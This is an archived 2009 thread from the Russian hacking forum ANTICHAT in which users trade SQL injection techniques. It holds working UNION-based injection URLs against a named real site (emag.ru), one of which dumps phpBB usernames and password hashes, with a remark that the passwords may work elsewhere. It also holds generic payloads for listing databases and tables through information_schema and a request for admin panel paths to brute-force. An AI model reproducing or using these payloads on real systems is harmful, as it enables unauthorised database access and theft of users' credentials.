ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.06.2009, 12:57
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от GOGA075
подскажите у меня руки кривые или вывода нет??
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(char(58),username,user _password),3,4,5,6,7,8,9,10+FROM+phpbb_users+limit +5,1000
таблица phpbb_users находится в базе данных SC:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,TABLE_SCHEMA,3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=char(0x70687062,0x625f7573,0x657273)
причем доступа туда нет. Но легко можно прочитать записи из таблицы phpbb_users1, что в базе данных acom:
Код:
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10+from+acom.phpbb_users1+limit+1,1
может эти пароли куда-то и подойдут 
|
|
|
27.06.2009, 13:15
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
А как можно перемещатся по БД, ели она не одна??
|
|
|
|
27.06.2009, 13:20
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
from имя_базы.таблица
|
|
|
|
27.06.2009, 13:26
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 24
Провел на форуме:
48501
Репутация:
-4
|
|
выложите список возможных путей в админку.
ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?
|
|
|
|
27.06.2009, 13:42
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
AlexSatter
А как мне узнать имина баз?
|
|
|
|
27.06.2009, 13:47
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Сообщение от GOGA075
AlexSatter
А как мне узнать имина баз?
Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+group+by+table_schema+limit+1 ,1
или
?id=-1+union+select+concat(table_name)+from+information _schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы.
Если 4-я ветка, то узнать имена таблиц можно только перебором.
|
|
|
|
27.06.2009, 13:48
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
select table_schema from information_schema.tables where table_name='table_name'
для 5той ветки
|
|
|
|
27.06.2009, 13:51
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
да мне не таблицы нужны!
а название баз данных!
|
|
|
|
27.06.2009, 14:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
GOGA075,
...?id=-1+union+select+schema_name+from+information_schema .schemata+limit+x,1
...?id=-1+union+select+group_concat(schema_name)+from+info rmation_schema.schemata
|
|
|
|
27.06.2009, 14:50
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
RulleR
Спасибо, работает!!!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
